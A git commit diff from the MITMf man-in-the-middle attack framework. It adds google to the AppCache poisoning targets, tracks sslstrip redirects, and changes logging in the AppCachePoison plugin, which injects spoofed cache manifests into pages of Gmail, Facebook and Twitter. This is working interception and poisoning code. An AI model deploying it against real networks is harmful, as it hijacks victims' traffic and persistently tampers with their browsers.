-Fixed bug in App Cache Poison plugin, missing function call resulted in some websites not loading

-Added output to the AppCachePoison plugin
2025-07-16 10:03:52 -07:00 · 2015-03-15 16:42:17 +01:00 · 2015-03-15 16:42:17 +01:00 · 0c57f39671
commit 0c57f39671
parent aa2fa90642
5 changed files with 22 additions and 9 deletions
--- a/README.md
+++ b/README.md
@ -5,7 +5,7 @@ Framework for Man-In-The-Middle attacks

 Quick tutorials, examples and dev updates at http://sign0f4.blogspot.it

-This tool is completely based on sergio-proxy https://github.com/supernothing/sergio-proxy and is an attempt to revive and update the project.
+This tool is based on sergio-proxy https://github.com/supernothing/sergio-proxy and is an attempt to revive and update the project.

 **Before submitting issues please read the appropriate section.**

--- a/config/mitmf.cfg
+++ b/config/mitmf.cfg
@ -163,6 +163,10 @@
 		manifest_url=http://mail.google.com/robots.txt
 		templates=default # could be omitted

+	[[google]]
+		tamper_url = http://www.google.com/
+		manifest_url = http://www.google.com/robots.txt
+
 	[[facebook]]
 		tamper_url=http://www.facebook.com/
 		manifest_url=http://www.facebook.com/robots.txt
@ -173,7 +177,7 @@
 		#tamper_url_match=^http://(www\.)?twitter\.com/$
 		manifest_url=http://twitter.com/robots.txt

-	[[testing]]
+	[[html5rocks]]
 		tamper_url=http://www.html5rocks.com/en/
 		manifest_url=http://www.html5rocks.com/robots.txt

--- a/libs/sslstrip/ServerConnection.py
+++ b/libs/sslstrip/ServerConnection.py
@ -113,6 +113,7 @@ class ServerConnection(HTTPClient):

        if (key.lower() == 'location'):
            value = self.replaceSecureLinks(value)
+            self.urlMonitor.addRedirection(self.client.uri, value)

        if (key.lower() == 'content-type'):
            if (value.find('image') != -1):
--- a/libs/sslstrip/URLMonitor.py
+++ b/libs/sslstrip/URLMonitor.py
@ -63,7 +63,9 @@ class URLMonitor:
            if from_url in s:
                s.add(to_url)
                return
-        self.redirects.append(set([from_url,to_url]))
+        url_set = set([from_url, to_url])
+        logging.debug("[URLMonitor] Set redirection: %s" % url_set)
+        self.redirects.append(url_set)

    def getRedirectionSet(self, url):
        for s in self.redirects:
--- a/plugins/AppCachePoison.py
+++ b/plugins/AppCachePoison.py
@ -38,20 +38,22 @@ class AppCachePlugin(Plugin):
        if "enable_only_in_useragents" in self.config:
            regexp = self.config["enable_only_in_useragents"]
            if regexp and not re.search(regexp,req_headers["user-agent"]):
-                logging.debug("Tampering disabled in this useragent (%s)" % (req_headers["user-agent"]))
+                logging.info("%s Tampering disabled in this useragent (%s)" % (ip, req_headers["user-agent"]))
                return {'request': request, 'data': data}
               
        urls = self.urlMonitor.getRedirectionSet(url)
-        
+        logging.debug("%s [AppCachePoison] Got redirection set: %s" % (ip, urls))
        (name,s,element,url) = self.getSectionForUrls(urls)
+
        if s is False:
          data = self.tryMassPoison(url, data, headers, req_headers, ip)
          return {'request': request, 'data': data}

-        logging.debug("Found URL %s in section %s" % (url, name))
+        logging.info("%s Found URL %s in section %s" % (ip, url, name))
        p = self.getTemplatePrefix(s)
+
        if element == 'tamper':
-          logging.debug("Poisoning tamper URL with template %s" % (p))
+          logging.info("%s Poisoning tamper URL with template %s" % (ip, p))
          if os.path.exists(p + '.replace'): # replace whole content
            f = open(p + '.replace','r')
            data = self.decorate(f.read(), s)
@ -68,12 +70,12 @@ class AppCachePlugin(Plugin):
          data = re.sub(re.compile("<html",re.IGNORECASE),"<html manifest=\"" + self.getManifestUrl(s)+"\"", data)
          
        elif element == "manifest":
-          logging.debug("Poisoning manifest URL")
+          logging.info("%s Poisoning manifest URL" % ip)
          data = self.getSpoofedManifest(url, s)
          headers.setRawHeaders("Content-Type", ["text/cache-manifest"])

        elif element == "raw": # raw resource to modify, it does not have to be html
-          logging.debug("Poisoning raw URL")
+          logging.info("%s Poisoning raw URL" % ip)
          if os.path.exists(p + '.replace'): # replace whole content
            f = open(p + '.replace','r')
            data = self.decorate(f.read(), s)
@ -164,12 +166,16 @@ class AppCachePlugin(Plugin):
              if isinstance(self.config[i], dict): #section
                section = self.config[i]
                name = i
+                
                if section.get('tamper_url',False) == url:
                  return (name, section, 'tamper',url)
+                
                if section.has_key('tamper_url_match') and re.search(section['tamper_url_match'], url):
                  return (name, section, 'tamper',url)
+                
                if section.get('manifest_url',False) == url:
                  return (name, section, 'manifest',url)
+
                if section.get('raw_url',False) == url:
                  return (name, section, 'raw',url)